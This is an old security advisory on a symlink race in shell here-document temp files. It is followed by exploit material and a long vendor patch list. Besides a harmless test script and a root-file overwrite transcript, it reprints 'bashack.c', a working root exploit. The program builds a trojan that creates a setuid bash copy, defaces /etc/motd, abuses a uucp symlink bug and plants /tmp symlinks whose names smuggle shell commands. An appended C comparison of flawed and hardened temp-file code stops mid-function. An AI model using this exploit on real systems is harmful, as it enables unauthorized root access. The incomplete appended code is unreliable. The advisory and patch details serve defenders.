Race condition vulnerability in UNIX shell redirection operations

Published: 2001-11-28
Updated: 2001-11-28
Severity: High
Threat level: local administrator privileges
Error type: race condition
Exploitation method: server mode

Affected systems

Apple MacOS X 10.0

Detailed description

bash, tcsh, cash, ksh and sh are shell programs found on various UNIX systems. They contain a vulnerability that allows an attacker to write to arbitrary files.

When a script or command line uses the << redirection operator, the shell creates a temporary file with a guessable name under /tmp, and it does not check whether that file already exists before creating it. By planting a symbolic link, an attacker can therefore write to arbitrary files with the privileges of the user performing the redirection, which can result in denial of service or privilege escalation.

Test code

Paul Szabo <psz@maths.usyd.edu.au> :

#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

------------------------sh exploit---------------------------------
/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12 Oct 29 03:55 rootfile
lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 -> rootfile
/tmp# cat <<BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
-rw------- 1 root root 12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#
---------------------------------------------------------------

/**************************************************************
root exploit: multiple subsystem errors allowing root exploit

bashack.c - Thu Nov 30 21:50:50 NZDT 2000

/etc/rc.d/ and scripts that are trusting the untrustworthy.
/bin/sh acts silly when u get it to use the << redirection.
it creates a mode 666 file with an easily predictable name,
containing the pid as the only variant. As the same sequence
of events happens at most start ups, the pid of the line in
/etc/rc.d/rc.sysinit that creates the /boot/kernel.h file
which uses << can be exploited. With another bit of bad it
will take until the next run of cron.weekly till you have root.
I'm sure someone can come up with a faster way.
(hint: lotsa stuff run as root have /sbin and /usr/sbin
in their paths. / is a pain when backticking, making it hard
to tell the program what to run...
FNAME below is a method of getting around that,
but its ugly as sin ;])

[root@continuity /root]# rpm -qf /usr/bin/uucp
uucp-1.06.1-20
[root@continuity /root]# rpm -qf /etc/rc.d/rc3.d
chkconfig-1.0.7-2
initscripts-4.48-1
[root@continuity /root]# rpm -qf /bin/bash
bash-1.14.7-16
[root@continuity /root]# rpm -qf /etc/cron.weekly/makewhatis.cron
man-1.5g-6

The big bug is like the tcsh one someone mentioned a while ago.
*****************************************************************/
#include <stdlib.h>
#include <stdio.h>

#define FNAME "/usr/man/man1/last.1.gz;export PATH=.;cd ..;cd ..;cd ..;cd ..;cd usr;cd sbin;uuconv;.1.gz"

main()
{
  int d;
  char fn[2000];
  char *homedir;
  FILE *file;

  printf("bashack - root using multiple config/input validation errors\n\n");
  printf("creating trojan in /usr/sbin/uuconv\n");
  printf(" - uucp bug -\n");
  printf("uucp follows symlinks as euid=uucp, (uid,gid,egid=you)\n\n");
  homedir=getenv("HOME");
  sprintf(fn,"%s/bashacker/",homedir);
  mkdir(fn);
  chdir(fn);
  sprintf(fn,"%s/bashacker/bashaker",homedir);
  unlink(fn);
  printf("== uuconv replacement\n");
  printf("* making uuconv.c\n");
  sprintf(fn,"%s/bashacker/uuconv.c",homedir);
  file=fopen(fn,"w");
  sprintf(fn,"%s/bashacker",homedir);
  fprintf(file,"main()\n{\n");
  fprintf(file,"printf(\"sendmail\n\");\n");
  fprintf(file,"system(\"/bin/cp /bin/bash %s/bashacker;",fn);
  fprintf(file,"/bin/chmod 6711 %s/bashacker;",fn);
  fprintf(file,"echo hacked by %s>>/etc/motd;",getenv("LOGNAME"));
  fprintf(file,"echo -n \\\"at about \\\" >>/etc/motd; /bin/date >>/etc/motd");
  fprintf(file,"\");\n");
  fprintf(file,"}\n");
  fclose(file);
  printf("* compiling ./uuconv.c ==> ./uuconv \n");
  system("cc -o uuconv uuconv.c -O2;strip uuconv");
  unlink("/var/spool/uucppublic/uuconv");
  symlink("/usr/sbin/uuconv","/var/spool/uucppublic/uuconv");
  printf("* copying to /usr/sbin via uucp bug\n");
  sprintf(fn, "/usr/bin/uucp %s/bashacker/uuconv /var/spool/uucppublic/uuconv",homedir);
  system(fn);
  printf("== cleaning up a little.\n");
  unlink("/var/spool/uucppublic/uuconv");
  unlink("uuconv");
  unlink("uuconv.c");
  printf("== set up /tmp for bash part of exploit.\n");
  for(d=100;d<150;d++)
  /* on my machine its something like 118-120 or something, but
     it does depend on what was running, or what files existed and stuff.
     so please excuse the shotgun approach. */
  {
    sprintf(fn,"/tmp/t%d-sh",d);
    unlink(fn);
    symlink(FNAME,fn);
  }
  printf("* my work here is done.\n\n");
  printf("now pray for some kinda of crash.\n\n\t--zen\n");
}

Solution

Apply the following patches as soon as possible:

Caldera eServer 2.3:
  Caldera RPM eServer 2.3 bash-1.14.7-14.i386.rpm
    ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/bash-1.14.7-14.i386.rpm

Caldera OpenLinux Desktop 2.3:
  Caldera RPM Desktop 2.3 bash-1.14.7-14.i386.rpm
    ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/bash-1.14.7-14.i386.rpm

Caldera eDesktop 2.4:
  Caldera RPM eDesktop 2.4 bash-1.14.7-14.i386.rpm
    ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/

Conectiva Linux graficas:
  Conectiva RPM graficas i386 bash-1.14.7-26cl.i386.rpm
    ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bash-1.14.7-26cl.i386.rpm

Conectiva Linux ecommerce:
  Conectiva RPM ecommerce i386 bash-1.14.7-26cl.i386.rpm
    ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bash-1.14.7-26cl.i386.rpm

Conectiva Linux 4.0es:
  Conectiva RPM 4.0es i386 bash-1.14.7-24cl.i386.rpm
    ftp://atualizacoes.conectiva.com.br/4.0es/i386/bash-1.14.7-24cl.i386.rpm

Conectiva Linux 4.0:
  Conectiva RPM 4.0 i386 bash-1.14.7-24cl.i386.rpm
    ftp://atualizacoes.conectiva.com.br/4.0/i386/bash-1.14.7-24cl.i386.rpm

Conectiva Linux 4.1:
  Conectiva RPM 4.1 i386 bash-1.14.7-24cl.i386.rpm
    ftp://atualizacoes.conectiva.com.br/4.1/i386/bash-1.14.7-24cl.i386.rpm

Conectiva Linux 4.2:
  Conectiva RPM 4.2 i386 bash-1.14.7-24cl.i386.rpm
    ftp://atualizacoes.conectiva.com.br/4.2/i386/bash-1.14.7-24cl.i386.rpm

Conectiva Linux 5.0:
  Conectiva RPM 5.0 i386 bash-1.14.7-26cl.i386.rpm
    ftp://atualizacoes.conectiva.com.br/5.0/i386/bash-1.14.7-26cl.i386.rpm

Conectiva Linux 5.1:
  Conectiva RPM 5.1 i386 bash-1.14.7-29cl.i386.rpm
    ftp://atualizacoes.conectiva.com.br/5.1/i386/bash-1.14.7-29cl.i386.rpm

Digital (Compaq) TRU64/DIGITAL UNIX 5.0:

FreeBSD FreeBSD 3.5.1:
  FreeBSD Upgrade ports-3 i386 bash-1.14.7.tgz
    ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/shells/bash-1.14.7.tgz

FreeBSD FreeBSD 4.2:
  FreeBSD Upgrade ports-4 i386 bash-1.14.7.tgz
    ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/shells/bash-1.14.7.tgz
  FreeBSD Upgrade ports-4 alpha bash-1.14.7.tgz
    ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/shells/bash-1.14.7.tgz

FreeBSD FreeBSD 5.0:
  FreeBSD Upgrade ports-5 i386 bash-1.14.7.tgz
    ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/shells/bash-1.14.7.tgz
  FreeBSD Upgrade ports-5 alpha bash-1.14.7.tgz
    ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/shells/bash-1.14.7.tgz

HP HP-UX 9.0:

HP HP-UX 11.11:

MandrakeSoft Linux Mandrake 6.0:
  MandrakeSoft RPM 6.0 i386 bash1-1.14.7-19.1mdk.i586.rpm
    http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/6.0/RPMS/bash1-1.14.7-19.1mdk.i586.rpm

MandrakeSoft Linux Mandrake 6.1:
  MandrakeSoft RPM 6.1 i386 bash1-1.14.7-19.1mdk.i586.rpm
    http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/6.1/RPMS/bash1-1.14.7-19.1mdk.i586.rpm

MandrakeSoft Linux Mandrake 7.0:
  MandrakeSoft RPM 7.0 i386 bash1-1.14.7-19.1mdk.i586.rpm
    http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/7.0/RPMS/bash1-1.14.7-19.1mdk.i586.rpm

MandrakeSoft Linux Mandrake 7.1:
  MandrakeSoft RPM 7.1 i386 bash1-1.14.7-21.1mdk.i586.rpm
    http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/7.1/RPMS/bash1-1.14.7-21.1mdk.i586.rpm

MandrakeSoft Linux Mandrake 7.2:
  MandrakeSoft RPM 7.2 i386 bash1-1.14.7-24.1mdk.i586.rpm
    http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/7.2/RPMS/bash1-1.14.7-24.1mdk.i586.rpm

Netscape Communicator 6.01a:

RedHat Linux 5.2 sparc:
  Red Hat Inc. RPM 5.2 sparc bash-1.14.7-23.5x.sparc.rpm
    ftp://updates.redhat.com/5.2/sparc/bash-1.14.7-23.5x.sparc.rpm

RedHat Linux 5.2 i386:
  Red Hat Inc. RPM 5.2 i386 bash-1.14.7-23.5x.i386.rpm
    ftp://updates.redhat.com/5.2/i386/bash-1.14.7-23.5x.i386.rpm

RedHat Linux 5.2 alpha:
  Red Hat Inc. RPM 5.2 alpha bash-1.14.7-23.5x.alpha.rpm
    ftp://updates.redhat.com/5.2/alpha/bash-1.14.7-23.5x.alpha.rpm

RedHat Linux 6.0 sparc:
  Red Hat Inc. RPM 6.2 sparc bash-1.14.7-23.6x.sparc.rpm
    ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm

RedHat Linux 6.0 i386:
  Red Hat Inc. RPM 6.2 i386 bash-1.14.7-23.6x.i386.rpm
    ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm

RedHat Linux 6.0 alpha:
  Red Hat Inc. RPM 6.2 alpha bash-1.14.7-23.6x.alpha.rpm
    ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm

RedHat Linux 6.1 sparc:
  Red Hat Inc. RPM 6.2 sparc bash-1.14.7-23.6x.sparc.rpm
    ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm

RedHat Linux 6.1 i386:
  Red Hat Inc. RPM 6.2 i386 bash-1.14.7-23.6x.i386.rpm
    ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm

RedHat Linux 6.1 alpha:
  Red Hat Inc. RPM 6.2 alpha bash-1.14.7-23.6x.alpha.rpm
    ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm

RedHat Linux 6.2E sparc:
  Red Hat Inc. RPM 6.2 sparc bash-1.14.7-23.6x.sparc.rpm
    ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm

RedHat Linux 6.2E i386:
  Red Hat Inc. RPM 6.2 i386 bash-1.14.7-23.6x.i386.rpm
    ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm

RedHat Linux 6.2E alpha:
  Red Hat Inc. RPM 6.2 alpha bash-1.14.7-23.6x.alpha.rpm
    ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm

RedHat Linux 6.2 sparc:
  Red Hat Inc. RPM 6.2 sparc bash-1.14.7-23.6x.sparc.rpm
    ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm

RedHat Linux 6.2 i386:
  Red Hat Inc. RPM 6.2 i386 bash-1.14.7-23.6x.i386.rpm
    ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm

RedHat Linux 6.2 alpha:
  Red Hat Inc. RPM 6.2 alpha bash-1.14.7-23.6x.alpha.rpm
    ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm

S.u.S.E. Linux 7.0:

SCO Open Server 5.0:
  SCO Upgrade OpenServer shells.tar.Z
    ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/

SCO Open Server 5.0.1:
  SCO Upgrade OpenServer shells.tar.Z
    ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/

SCO Open Server 5.0.2:
  SCO Upgrade OpenServer shells.tar.Z
    ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/

SCO Open Server 5.0.3:
  SCO Upgrade OpenServer shells.tar.Z
    ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/

SCO Open Server 5.0.4:
  SCO Upgrade OpenServer shells.tar.Z
    ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/

SCO Open Server 5.0.5:
  SCO Upgrade OpenServer shells.tar.Z
    ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/

SCO Open Server 5.0.6a:
  SCO Upgrade OpenServer shells.tar.Z
    ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/

SCO Open Server 5.0.6:
  SCO Upgrade OpenServer shells.tar.Z
    ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/

SGI IRIX 6.5:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.1:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.2:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.3:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.4:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.5:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.6:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.7:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.8:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.9:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.10:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.11:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.12:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

SGI IRIX 6.5.13:
  SGI Upgrade IRIX 6.5.14 Maintenance Release
    http://support.sgi.com/colls/patches/tools/relstream/index.html

Sun Solaris 2.5.1:

Sun Solaris 2.6:

Sun Solaris 7.0:

tcsh tcsh 6.7.2:
  Debian Upgrade 2.2 alpha tcsh-kanji_6.09.00-10_alpha.deb
    http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh-kanji_6.09.00-10_alpha.deb
  Trustix RPM 1.0/1.1 tcsh-6.09-5tr.i586
    ftp://ftp.trustix.net/pub/Trustix/updates/tcsh-6.09-5tr.i586.rpm
  Debian Upgrade 2.2 alpha tcsh_6.09.00-10_alpha.deb
    http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh_6.09.00-10_alpha.deb
  Debian Upgrade 2.2 arm tcsh-kanji_6.09.00-10_arm.deb
    http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh-kanji_6.09.00-10_arm.deb
  Debian Upgrade 2.2 arm tcsh_6.09.00-10_arm.deb
    http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh_6.09.00-10_arm.deb
  Debian Upgrade 2.2 (Intel): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh-kanji_6.09.00-10_i386.deb
  Debian Upgrade 2.2 (Intel): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh_6.09.00-10_i386.deb
  Debian Upgrade 2.2 (m68k): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh-kanji_6.09.00-10_m68k.deb
  Debian Upgrade 2.2 (m68k): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh_6.09.00-10_m68k.deb
  Debian Upgrade 2.2 (ppc): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh-kanji_6.09.00-10_powerpc.deb
  Debian Upgrade 2.2 (ppc): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh_6.09.00-10_powerpc.deb
  Debian Upgrade 2.2 (Sparc): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh-kanji_6.09.00-10_sparc.deb
  Debian Upgrade 2.2 (Sparc): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh_6.09.00-10_sparc.deb

tcsh tcsh 6.8.00:
  Debian Upgrade 2.2 alpha tcsh-kanji_6.09.00-10_alpha.deb
    http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh-kanji_6.09.00-10_alpha.deb
  Trustix RPM 1.0/1.1 tcsh-6.09-5tr.i586
    ftp://ftp.trustix.net/pub/Trustix/updates/tcsh-6.09-5tr.i586.rpm
  Debian Upgrade 2.2 alpha tcsh_6.09.00-10_alpha.deb
    http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh_6.09.00-10_alpha.deb
  Debian Upgrade 2.2 arm tcsh-kanji_6.09.00-10_arm.deb
    http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh-kanji_6.09.00-10_arm.deb
  Debian Upgrade 2.2 arm tcsh_6.09.00-10_arm.deb
    http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh_6.09.00-10_arm.deb
  Debian Upgrade 2.2 (Intel): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh-kanji_6.09.00-10_i386.deb
  Debian Upgrade 2.2 (Intel): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh_6.09.00-10_i386.deb
  Debian Upgrade 2.2 (m68k): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh-kanji_6.09.00-10_m68k.deb
  Debian Upgrade 2.2 (m68k): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh_6.09.00-10_m68k.deb
  Debian Upgrade 2.2 (ppc): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh-kanji_6.09.00-10_powerpc.deb
  Debian Upgrade 2.2 (ppc): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh_6.09.00-10_powerpc.deb
  Debian Upgrade 2.2 (Sparc): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh-kanji_6.09.00-10_sparc.deb
  Debian Upgrade 2.2 (Sparc): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh_6.09.00-10_sparc.deb
  Conectiva RPM 4.0 i386 tcsh-6.08.00-7cl.i386.rpm
    ftp://atualizacoes.conectiva.com.br/4.0/i386/tcsh-6.08.00-7cl.i386.rpm
  Conectiva RPM 4.0es i386 tcsh-6.08.00-7cl
    ftp://atualizacoes.conectiva.com.br/4.0es/i386/tcsh-6.08.00-7cl.i386.rpm
  Conectiva RPM 4.1 i386 tcsh-6.09.00-7cl
    ftp://atualizacoes.conectiva.com.br/4.1/i386/tcsh-6.09.00-7cl.i386.rpm
  Conectiva RPM 4.2 i386 tcsh-6.09.00-7cl
    ftp://atualizacoes.conectiva.com.br/4.2/i386/tcsh-6.09.00-7cl.i386.rpm
  Conectiva RPM 5.0 i386 tcsh-6.09.00-7cl
    ftp://atualizacoes.conectiva.com.br/5.0/i386/tcsh-6.09.00-7cl.i386.rpm
  Conectiva RPM 5.1 i386 tcsh-6.09.00-7cl
    ftp://atualizacoes.conectiva.com.br/5.1/i386/tcsh-6.09.00-7cl.i386.rpm
  Conectiva RPM ecommerce i386 tcsh-6.09.00-7cl
    ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tcsh-6.09.00-7cl.i386.rpm
  Conectiva RPM graficas i386 tcsh-6.09.00-7cl
    ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tcsh-6.09.00-7cl.i386.rpm

tcsh tcsh 6.9.00:
  Debian Upgrade 2.2 alpha tcsh-kanji_6.09.00-10_alpha.deb
    http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh-kanji_6.09.00-10_alpha.deb
  Red Hat Inc. RPM 5.2 alpha tcsh-6.10-0.5.x
    ftp://updates.redhat.com/5.2/alpha/tcsh-6.10-0.5.x.alpha.rpm
  Debian Upgrade 2.2 (Intel): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh-kanji_6.09.00-10_i386.deb
  Debian Upgrade 2.2 (Intel): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh_6.09.00-10_i386.deb
  Debian Upgrade 2.2 (m68k): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh-kanji_6.09.00-10_m68k.deb
  Debian Upgrade 2.2 (m68k): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh_6.09.00-10_m68k.deb
  Debian Upgrade 2.2 (ppc): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh-kanji_6.09.00-10_powerpc.deb
  Debian Upgrade 2.2 (ppc): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh_6.09.00-10_powerpc.deb
  Debian Upgrade 2.2 (Sparc): tcsh-kanji_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh-kanji_6.09.00-10_sparc.deb
  Debian Upgrade 2.2 (Sparc): tcsh_6.09.00-10
    http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh_6.09.00-10_sparc.deb
  Red Hat Inc. RPM 5.2 sparc tcsh-6.10-0.5.x
    ftp://updates.redhat.com/5.2/sparc/tcsh-6.10-0.5.x.sparc.rpm
  Red Hat Inc. RPM 5.2 i386 tcsh-6.10-0.5.x
    ftp://updates.redhat.com/5.2/i386/tcsh-6.10-0.5.x.i386.rpm
  Red Hat Inc. RPM 6.0 sparc tcsh-6.10-0.6.x
    ftp://updates.redhat.com/6.0/sparc/tcsh-6.10-0.6.x.sparc.rpm
  Red Hat Inc. RPM 6.0 i386 tcsh-6.10-0.6.x
    ftp://updates.redhat.com/6.0/i386/tcsh-6.10-0.6.x.i386.rpm
  Red Hat Inc. RPM 6.0 alpha tcsh-6.10-0.6.x
    ftp://updates.redhat.com/6.0/alpha/tcsh-6.10-0.6.x.alpha.rpm
  Red Hat Inc. RPM 6.1 alpha tcsh-6.10-0.6.x
    ftp://updates.redhat.com/6.1/alpha/tcsh-6.10-0.6.x.alpha.rpm
  Red Hat Inc. RPM 6.1 sparc tcsh-6.10-0.6.x
    ftp://updates.redhat.com/6.1/sparc/tcsh-6.10-0.6.x.sparc.rpm
  Red Hat Inc. RPM 6.1 i386 tcsh-6.10-0.6.x
    ftp://updates.redhat.com/6.1/i386/tcsh-6.10-0.6.x.i386.rpm
  Red Hat Inc. RPM 6.2 alpha tcsh-6.10-0.6.x
    ftp://updates.redhat.com/6.2/alpha/tcsh-6.10-0.6.x.alpha.rpm
  Red Hat Inc. RPM 6.2 sparc tcsh-6.10-0.6.x
    ftp://updates.redhat.com/6.2/sparc/tcsh-6.10-0.6.x.sparc.rpm
  Red Hat Inc. RPM 6.2 i386 tcsh-6.10-0.6.x
    ftp://updates.redhat.com/6.2/i386/tcsh-6.10-0.6.x.i386.rpm
  Red Hat Inc. RPM 7.0 alpha tcsh-6.10-1
    ftp://updates.redhat.com/7.0/alpha/tcsh-6.10-1.alpha.rpm
  Red Hat Inc. RPM 7.0 i386 tcsh-6.10-1
    ftp://updates.redhat.com/7.0/i386/tcsh-6.10-1.i386.rpm
  Caldera RPM OpenLinux 2.3 tcsh-6.10.00-2
    ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/tcsh-6.10.00-2.i386.rpm
  Caldera RPM OpenLinux 2.3: tcsh-doc-html-6.10.00-2
    ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/tcsh-doc-html-6.10.00-2.i386.rpm
  Caldera RPM eServer 2.3/eBuilder 3.0: tcsh-6.10.00-2
    ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/tcsh-6.10.00-2.i386.rpm
  Caldera RPM eServer 2.3/eBuilder 3.0: tcsh-doc-html-6.10.00-2
    ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/tcsh-doc-html-6.10.00-2.i386.rpm
  Caldera RPM eDesktop 2.4: tcsh-6.10.00-2
    ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/tcsh-6.10.00-2.i386.rpm
  Caldera RPM eDesktop 2.4: tcsh-doc-html-6.10.00-2
    ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/tcsh-doc-html-6.10.00-2.i386.rpm
  Trustix RPM 1.0/1.1 tcsh-6.09-5tr.i586
    ftp://ftp.trustix.net/pub/Trustix/updates/tcsh-6.09-5tr.i586.rpm
  Debian Upgrade 2.2 alpha tcsh_6.09.00-10_alpha.deb
    http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh_6.09.00-10_alpha.deb
  Debian Upgrade 2.2 arm tcsh-kanji_6.09.00-10_arm.deb
    http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh-kanji_6.09.00-10_arm.deb
  Debian Upgrade 2.2 arm tcsh_6.09.00-10_arm.deb
    http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh_6.09.00-10_arm.deb
  Kris Kennaway Patch tcsh.patch
    http://www.securityfocus.com/data/vulnerabilities/patches/tcsh.patch

Wirex Immunix OS 6.2:
  Wirex RPM 6.2 i386 bash-1.14.7-23.6x_StackGuard.i386.rpm
    http://www.immunix.org/ImmunixOS/6.2/updates/RPMS/bash-1.14.7-23.6x_StackGuard.i386.rpm

Related information

Reference: http://www.kb.cert.org/vuls/id/10277
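
The flaw described in this advisory (a here-document temporary file created under a guessable name, with no existence check and with symbolic links followed) set beside a hardened creation path. This is an added example, not part of the original advisory or of any shell's source; the function names, the sandbox directory and the file contents are constructed for illustration, and the PID 12660 is the one shown in the advisory's transcript.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Flawed pattern: guessable name sh<pid>, no existence check, symlinks
   followed, so the data lands in whatever file a planted link targets. */
static int heredoc_insecure(const char *dir, long pid, const char *body)
{
    char path[512];
    snprintf(path, sizeof path, "%s/sh%ld", dir, pid);
    int fd = open(path, O_WRONLY | O_CREAT, 0666);
    if (fd < 0) return -1;
    ssize_t n = write(fd, body, strlen(body));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Hardened pattern: mkstemp() chooses a random name and creates it with
   O_CREAT|O_EXCL, mode 0600; an existing file or symlink is never reused. */
static int heredoc_safe(const char *dir, const char *body)
{
    char path[512];
    snprintf(path, sizeof path, "%s/shXXXXXX", dir);
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    unlink(path);                 /* the open descriptor is all that is needed */
    ssize_t n = write(fd, body, strlen(body));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Plants a symlink at the guessable name inside a private sandbox, does one
   here-document write; returns 1 if the target is unchanged, 0 if overwritten, -1 on setup error. */
static int victim_survives(int use_safe)
{
    char dir[] = "/tmp/heredoc-demo-XXXXXX", victim[600], link[600], buf[64];
    long pid = 12660;             /* stand-in for $$, from the transcript */
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/rootfile", dir);
    snprintf(link, sizeof link, "%s/sh%ld", dir, pid);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("hello world\n", f);
    fclose(f);
    if (symlink(victim, link) != 0) return -1;
    if (use_safe) heredoc_safe(dir, "FOO\n");
    else          heredoc_insecure(dir, pid, "FOO\n");
    f = fopen(victim, "r");
    size_t n = f ? fread(buf, 1, sizeof buf - 1, f) : 0;
    if (f) fclose(f);
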